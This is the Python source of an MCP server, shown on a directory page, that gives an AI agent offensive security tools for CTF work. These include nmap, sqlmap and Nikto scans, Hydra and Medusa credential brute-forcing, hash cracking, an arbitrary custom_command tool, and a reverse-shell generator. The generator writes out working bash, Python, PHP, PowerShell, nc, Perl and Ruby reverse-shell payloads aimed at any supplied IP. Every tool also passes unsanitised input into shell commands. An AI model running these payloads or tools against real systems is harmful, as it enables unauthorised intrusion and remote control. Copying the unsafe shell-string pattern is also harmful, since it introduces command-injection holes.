Skip to main content
Glama

Exegol MCP Server

by janoujan
exegol_server.py23.7 kB
#!/usr/bin/env python3 """ Exegol MCP Server - Advanced penetration testing toolkit for CTF competitions """ import os import sys import logging import subprocess import json from datetime import datetime, timezone from pathlib import Path import httpx from mcp.server.fastmcp import FastMCP # Configure logging to stderr logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', stream=sys.stderr ) logger = logging.getLogger("exegol-server") # Initialize MCP server mcp = FastMCP("exegol") # Configuration RESULTS_DIR = os.environ.get("EXEGOL_RESULTS_DIR", "/results") OBSIDIAN_PATH = os.environ.get("OBSIDIAN_EXEGOL_PATH", "/results") # === UTILITY FUNCTIONS === def save_result(tool_name: str, content: str, target: str = ""): """Save scan results with timestamp to Obsidian vault.""" try: timestamp = datetime.now().strftime("%Y%m%d_%H%M%S") target_safe = target.replace("/", "_").replace(":", "_") if target else "general" filename = f"{timestamp}_{tool_name}_{target_safe}.txt" filepath = Path(OBSIDIAN_PATH) / filename os.makedirs(OBSIDIAN_PATH, exist_ok=True) with open(filepath, 'w') as f: f.write(f"# {tool_name} Results\n") f.write(f"Target: {target}\n") f.write(f"Timestamp: {datetime.now().isoformat()}\n") f.write(f"\n{'='*60}\n\n") f.write(content) return str(filepath) except Exception as e: logger.error(f"Failed to save results: {e}") return "" def run_command(command: str, timeout: int = 300): """Execute command and return output.""" try: result = subprocess.run( command, shell=True, capture_output=True, text=True, timeout=timeout ) return result.stdout if result.returncode == 0 else result.stderr, result.returncode except subprocess.TimeoutExpired: return "⏱️ Command timed out", -1 except Exception as e: return f"❌ Error: {str(e)}", -1 # === RECONNAISSANCE TOOLS === @mcp.tool() async def nmap_scan(target: str = "", scan_type: str = "quick", ports: str = "") -> str: """Perform nmap network scan with options: quick, full, stealth, vuln, or custom ports.""" if not target.strip(): return "❌ Error: Target is required" scan_types = { "quick": "-sV -sC -T4", "full": "-p- -sV -sC -T4", "stealth": "-sS -sV -T2", "vuln": "-sV --script vuln", "custom": f"-p {ports}" if ports else "-p-" } flags = scan_types.get(scan_type, scan_types["quick"]) command = f"nmap {flags} {target}" logger.info(f"Running nmap scan: {command}") output, returncode = run_command(command) if returncode == 0: filepath = save_result("nmap", output, target) return f"✅ Nmap scan completed\n\n{output}\n\n📁 Saved to: {filepath}" else: return f"❌ Nmap scan failed:\n{output}" @mcp.tool() async def gobuster_dir(url: str = "", wordlist: str = "common", extensions: str = "") -> str: """Perform directory brute-forcing with gobuster using wordlists: common, medium, big, or custom path.""" if not url.strip(): return "❌ Error: URL is required" wordlists = { "common": "/usr/share/wordlists/dirb/common.txt", "medium": "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt", "big": "/usr/share/wordlists/dirbuster/directory-list-2.3-big.txt" } wlist = wordlists.get(wordlist, wordlist) ext_flag = f"-x {extensions}" if extensions else "" command = f"gobuster dir -u {url} -w {wlist} {ext_flag} -q" logger.info(f"Running gobuster: {command}") output, returncode = run_command(command, timeout=600) filepath = save_result("gobuster", output, url) return f"✅ Gobuster scan completed\n\n{output}\n\n📁 Saved to: {filepath}" @mcp.tool() async def ffuf_scan(url: str = "", wordlist: str = "common", mode: str = "dir") -> str: """Perform fuzzing with ffuf for directory, vhost, or parameter discovery.""" if not url.strip(): return "❌ Error: URL is required" wordlists = { "common": "/usr/share/wordlists/dirb/common.txt", "medium": "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt", "params": "/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt" } wlist = wordlists.get(wordlist, wordlist) if mode == "dir": command = f"ffuf -u {url}/FUZZ -w {wlist} -c -v" elif mode == "vhost": command = f"ffuf -u {url} -H 'Host: FUZZ' -w {wlist} -c -v" elif mode == "param": command = f"ffuf -u {url}?FUZZ=test -w {wlist} -c -v" else: return "❌ Invalid mode. Use: dir, vhost, or param" logger.info(f"Running ffuf: {command}") output, returncode = run_command(command, timeout=600) filepath = save_result("ffuf", output, url) return f"✅ FFUF scan completed\n\n{output}\n\n📁 Saved to: {filepath}" @mcp.tool() async def whatweb_scan(target: str = "", aggression: str = "1") -> str: """Identify web technologies and CMS using WhatWeb with aggression levels 1-4.""" if not target.strip(): return "❌ Error: Target is required" command = f"whatweb -a {aggression} -v {target}" logger.info(f"Running whatweb: {command}") output, returncode = run_command(command) filepath = save_result("whatweb", output, target) return f"✅ WhatWeb scan completed\n\n{output}\n\n📁 Saved to: {filepath}" # === WEB EXPLOITATION TOOLS === @mcp.tool() async def sqlmap_scan(url: str = "", data: str = "", cookie: str = "", technique: str = "") -> str: """Perform SQL injection testing with sqlmap on URL with optional POST data and cookies.""" if not url.strip(): return "❌ Error: URL is required" cmd_parts = ["sqlmap", "-u", url, "--batch", "--random-agent"] if data: cmd_parts.extend(["--data", data]) if cookie: cmd_parts.extend(["--cookie", cookie]) if technique: cmd_parts.extend(["--technique", technique]) command = " ".join(cmd_parts) logger.info(f"Running sqlmap: {command}") output, returncode = run_command(command, timeout=900) filepath = save_result("sqlmap", output, url) return f"✅ SQLMap scan completed\n\n{output}\n\n📁 Saved to: {filepath}" @mcp.tool() async def nikto_scan(target: str = "", ssl: str = "no") -> str: """Perform web vulnerability scanning with Nikto on target with optional SSL.""" if not target.strip(): return "❌ Error: Target is required" ssl_flag = "-ssl" if ssl.lower() == "yes" else "" command = f"nikto -h {target} {ssl_flag}" logger.info(f"Running nikto: {command}") output, returncode = run_command(command, timeout=900) filepath = save_result("nikto", output, target) return f"✅ Nikto scan completed\n\n{output}\n\n📁 Saved to: {filepath}" @mcp.tool() async def wpscan_scan(url: str = "", enumerate: str = "vp") -> str: """Scan WordPress sites with WPScan enumerating plugins, themes, users, or all.""" if not url.strip(): return "❌ Error: URL is required" command = f"wpscan --url {url} --enumerate {enumerate} --random-user-agent" logger.info(f"Running wpscan: {command}") output, returncode = run_command(command, timeout=900) filepath = save_result("wpscan", output, url) return f"✅ WPScan completed\n\n{output}\n\n📁 Saved to: {filepath}" # === POST-EXPLOITATION TOOLS === @mcp.tool() async def reverse_shell_generator(ip: str = "", port: str = "4444", shell_type: str = "bash") -> str: """Generate reverse shell payloads for bash, python, php, powershell, nc, perl, ruby.""" if not ip.strip(): return "❌ Error: IP address is required" shells = { "bash": f"bash -i >& /dev/tcp/{ip}/{port} 0>&1", "python": f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ip}\",{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'", "php": f"php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"/bin/sh -i <&3 >&3 2>&3\");'", "powershell": f"powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"{ip}\",{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()", "nc": f"nc -e /bin/sh {ip} {port}", "perl": f"perl -e 'use Socket;$i=\"{ip}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");}};'", "ruby": f"ruby -rsocket -e'f=TCPSocket.open(\"{ip}\",{port}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'" } if shell_type not in shells: return f"❌ Invalid shell type. Available: {', '.join(shells.keys())}" payload = shells[shell_type] result = f"🐚 Reverse Shell Payload ({shell_type})\n\n{payload}\n\n⚡ Listener command:\nnc -lvnp {port}" filepath = save_result("reverse_shell", result, f"{ip}_{port}") return f"{result}\n\n📁 Saved to: {filepath}" @mcp.tool() async def linpeas_analyze(target_file: str = "") -> str: """Run LinPEAS privilege escalation analyzer on a system or analyze output file.""" if target_file: try: with open(target_file, 'r') as f: content = f.read() return f"✅ LinPEAS output loaded:\n\n{content}" except Exception as e: return f"❌ Error reading file: {str(e)}" command = "linpeas.sh" logger.info("Running LinPEAS") output, returncode = run_command(command, timeout=300) filepath = save_result("linpeas", output, "localhost") return f"✅ LinPEAS completed\n\n{output}\n\n📁 Saved to: {filepath}" # === CRYPTOGRAPHY TOOLS === @mcp.tool() async def hash_identify(hash_value: str = "") -> str: """Identify hash type using hash-identifier for common hash algorithms.""" if not hash_value.strip(): return "❌ Error: Hash value is required" command = f"echo '{hash_value}' | hash-identifier" logger.info("Identifying hash type") output, returncode = run_command(command) filepath = save_result("hash_identify", output, "hash") return f"✅ Hash identification completed\n\n{output}\n\n📁 Saved to: {filepath}" @mcp.tool() async def john_crack(hash_file: str = "", wordlist: str = "rockyou", format: str = "") -> str: """Crack password hashes with John the Ripper using rockyou or custom wordlist.""" if not hash_file.strip(): return "❌ Error: Hash file path is required" wordlists = { "rockyou": "/usr/share/wordlists/rockyou.txt", "custom": wordlist } wlist = wordlists.get(wordlist, wordlist) format_flag = f"--format={format}" if format else "" command = f"john {format_flag} --wordlist={wlist} {hash_file}" logger.info(f"Running John the Ripper: {command}") output, returncode = run_command(command, timeout=3600) filepath = save_result("john", output, hash_file) return f"✅ John the Ripper completed\n\n{output}\n\n📁 Saved to: {filepath}" @mcp.tool() async def hashcat_crack(hash_value: str = "", hash_mode: str = "0", wordlist: str = "rockyou") -> str: """Crack hashes with Hashcat specifying mode and wordlist: rockyou or custom.""" if not hash_value.strip(): return "❌ Error: Hash value is required" wordlists = { "rockyou": "/usr/share/wordlists/rockyou.txt" } wlist = wordlists.get(wordlist, wordlist) command = f"hashcat -m {hash_mode} -a 0 '{hash_value}' {wlist}" logger.info(f"Running Hashcat: {command}") output, returncode = run_command(command, timeout=3600) filepath = save_result("hashcat", output, "hash") return f"✅ Hashcat completed\n\n{output}\n\n📁 Saved to: {filepath}" @mcp.tool() async def decode_encode(text: str = "", operation: str = "base64_decode", encoding: str = "") -> str: """Encode or decode text using base64, hex, url, rot13, or custom encoding.""" if not text.strip(): return "❌ Error: Text is required" try: if operation == "base64_decode": command = f"echo '{text}' | base64 -d" elif operation == "base64_encode": command = f"echo '{text}' | base64" elif operation == "hex_decode": command = f"echo '{text}' | xxd -r -p" elif operation == "hex_encode": command = f"echo '{text}' | xxd -p" elif operation == "url_decode": command = f"echo '{text}' | python3 -c 'import sys; from urllib.parse import unquote; print(unquote(sys.stdin.read()))'" elif operation == "url_encode": command = f"echo '{text}' | python3 -c 'import sys; from urllib.parse import quote; print(quote(sys.stdin.read()))'" elif operation == "rot13": command = f"echo '{text}' | tr 'A-Za-z' 'N-ZA-Mn-za-m'" else: return f"❌ Invalid operation. Available: base64_encode, base64_decode, hex_encode, hex_decode, url_encode, url_decode, rot13" output, returncode = run_command(command) if returncode == 0: filepath = save_result("encode_decode", output, operation) return f"✅ {operation} completed\n\n{output}\n\n📁 Saved to: {filepath}" else: return f"❌ Operation failed:\n{output}" except Exception as e: return f"❌ Error: {str(e)}" # === OSINT TOOLS === @mcp.tool() async def whois_lookup(domain: str = "") -> str: """Perform WHOIS lookup on domain to get registration and ownership information.""" if not domain.strip(): return "❌ Error: Domain is required" command = f"whois {domain}" logger.info(f"Running whois: {command}") output, returncode = run_command(command) filepath = save_result("whois", output, domain) return f"✅ WHOIS lookup completed\n\n{output}\n\n📁 Saved to: {filepath}" @mcp.tool() async def dns_enum(domain: str = "", record_type: str = "A") -> str: """Enumerate DNS records for domain using types: A, AAAA, MX, NS, TXT, CNAME, SOA, ANY.""" if not domain.strip(): return "❌ Error: Domain is required" command = f"dig {domain} {record_type} +short" logger.info(f"Running DNS enumeration: {command}") output, returncode = run_command(command) filepath = save_result("dns_enum", output, domain) return f"✅ DNS enumeration completed\n\n{output}\n\n📁 Saved to: {filepath}" @mcp.tool() async def subdomain_enum(domain: str = "", tool: str = "subfinder") -> str: """Enumerate subdomains using subfinder, assetfinder, or amass tools.""" if not domain.strip(): return "❌ Error: Domain is required" tools = { "subfinder": f"subfinder -d {domain} -silent", "assetfinder": f"assetfinder --subs-only {domain}", "amass": f"amass enum -passive -d {domain}" } command = tools.get(tool, tools["subfinder"]) logger.info(f"Running subdomain enumeration: {command}") output, returncode = run_command(command, timeout=600) filepath = save_result("subdomain_enum", output, domain) return f"✅ Subdomain enumeration completed\n\n{output}\n\n📁 Saved to: {filepath}" @mcp.tool() async def theHarvester_scan(domain: str = "", sources: str = "google") -> str: """Gather emails, subdomains, IPs using theHarvester from sources: google, bing, linkedin, twitter, all.""" if not domain.strip(): return "❌ Error: Domain is required" command = f"theHarvester -d {domain} -b {sources}" logger.info(f"Running theHarvester: {command}") output, returncode = run_command(command, timeout=600) filepath = save_result("theharvester", output, domain) return f"✅ theHarvester scan completed\n\n{output}\n\n📁 Saved to: {filepath}" # === STEGANOGRAPHY TOOLS === @mcp.tool() async def steghide_extract(file_path: str = "", passphrase: str = "") -> str: """Extract hidden data from image files using steghide with optional passphrase.""" if not file_path.strip(): return "❌ Error: File path is required" pass_flag = f"-p {passphrase}" if passphrase else "-p ''" output_file = f"{file_path}_extracted.txt" command = f"steghide extract -sf {file_path} {pass_flag} -xf {output_file}" logger.info(f"Running steghide: {command}") output, returncode = run_command(command) try: with open(output_file, 'r') as f: extracted = f.read() result = f"✅ Steghide extraction completed\n\nExtracted content:\n{extracted}" except: result = f"ℹ️ Steghide output:\n{output}" filepath = save_result("steghide", result, file_path) return f"{result}\n\n📁 Saved to: {filepath}" @mcp.tool() async def exiftool_analyze(file_path: str = "") -> str: """Extract metadata from files using exiftool to find hidden information.""" if not file_path.strip(): return "❌ Error: File path is required" command = f"exiftool {file_path}" logger.info(f"Running exiftool: {command}") output, returncode = run_command(command) filepath = save_result("exiftool", output, file_path) return f"✅ ExifTool analysis completed\n\n{output}\n\n📁 Saved to: {filepath}" @mcp.tool() async def binwalk_analyze(file_path: str = "", extract: str = "no") -> str: """Analyze files for embedded data and firmware with binwalk, optionally extract contents.""" if not file_path.strip(): return "❌ Error: File path is required" extract_flag = "-e" if extract.lower() == "yes" else "" command = f"binwalk {extract_flag} {file_path}" logger.info(f"Running binwalk: {command}") output, returncode = run_command(command) filepath = save_result("binwalk", output, file_path) return f"✅ Binwalk analysis completed\n\n{output}\n\n📁 Saved to: {filepath}" # === BRUTE FORCE TOOLS === @mcp.tool() async def hydra_bruteforce(target: str = "", service: str = "ssh", username: str = "", wordlist: str = "rockyou") -> str: """Brute-force login credentials with Hydra for ssh, ftp, http, smb, rdp services.""" if not target.strip() or not service.strip(): return "❌ Error: Target and service are required" wordlists = { "rockyou": "/usr/share/wordlists/rockyou.txt" } wlist = wordlists.get(wordlist, wordlist) user_flag = f"-l {username}" if username else "-L /usr/share/wordlists/metasploit/unix_users.txt" command = f"hydra -v {user_flag} -P {wlist} {target} {service}" logger.info(f"Running Hydra: {command}") output, returncode = run_command(command, timeout=3600) filepath = save_result("hydra", output, f"{target}_{service}") return f"✅ Hydra brute-force completed\n\n{output}\n\n📁 Saved to: {filepath}" @mcp.tool() async def medusa_bruteforce(target: str = "", service: str = "ssh", username: str = "", wordlist: str = "rockyou") -> str: """Brute-force credentials with Medusa for various network services.""" if not target.strip() or not service.strip(): return "❌ Error: Target and service are required" wordlists = { "rockyou": "/usr/share/wordlists/rockyou.txt" } wlist = wordlists.get(wordlist, wordlist) user_flag = f"-u {username}" if username else "-U /usr/share/wordlists/metasploit/unix_users.txt" command = f"medusa -h {target} -M {service} {user_flag} -P {wlist}" logger.info(f"Running Medusa: {command}") output, returncode = run_command(command, timeout=3600) filepath = save_result("medusa", output, f"{target}_{service}") return f"✅ Medusa brute-force completed\n\n{output}\n\n📁 Saved to: {filepath}" # === UTILITY TOOLS === @mcp.tool() async def list_saved_results(filter: str = "") -> str: """List all saved scan results from Obsidian vault with optional filter.""" try: files = list(Path(OBSIDIAN_PATH).glob("*.txt")) if filter: files = [f for f in files if filter.lower() in f.name.lower()] files.sort(key=lambda x: x.stat().st_mtime, reverse=True) result = "📁 Saved Results:\n\n" for f in files[:50]: size = f.stat().st_size mtime = datetime.fromtimestamp(f.stat().st_mtime).strftime("%Y-%m-%d %H:%M:%S") result += f"• {f.name} ({size} bytes) - {mtime}\n" if len(files) > 50: result += f"\n... and {len(files) - 50} more files" return result if files else "ℹ️ No results found" except Exception as e: return f"❌ Error listing results: {str(e)}" @mcp.tool() async def read_saved_result(filename: str = "") -> str: """Read a specific saved result file from Obsidian vault.""" if not filename.strip(): return "❌ Error: Filename is required" try: filepath = Path(OBSIDIAN_PATH) / filename with open(filepath, 'r') as f: content = f.read() return f"✅ File content:\n\n{content}" except FileNotFoundError: return f"❌ File not found: {filename}" except Exception as e: return f"❌ Error reading file: {str(e)}" @mcp.tool() async def custom_command(command: str = "", save: str = "yes") -> str: """Execute custom command in Exegol container with optional result saving.""" if not command.strip(): return "❌ Error: Command is required" logger.info(f"Executing custom command: {command}") output, returncode = run_command(command, timeout=600) result = f"🔧 Command: {command}\n\n{output}" if save.lower() == "yes": filepath = save_result("custom_command", result, "custom") return f"{result}\n\n📁 Saved to: {filepath}" else: return result # === SERVER STARTUP === if __name__ == "__main__": logger.info("Starting Exegol MCP server...") logger.info(f"Results directory: {OBSIDIAN_PATH}") # Create results directory if it doesn't exist os.makedirs(OBSIDIAN_PATH, exist_ok=True) try: mcp.run(transport='stdio') except Exception as e: logger.error(f"Server error: {e}", exc_info=True) sys.exit(1)

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/janoujan/exegol-mcp-server'

If you have feedback or need assistance with the MCP directory API, please join our Discord server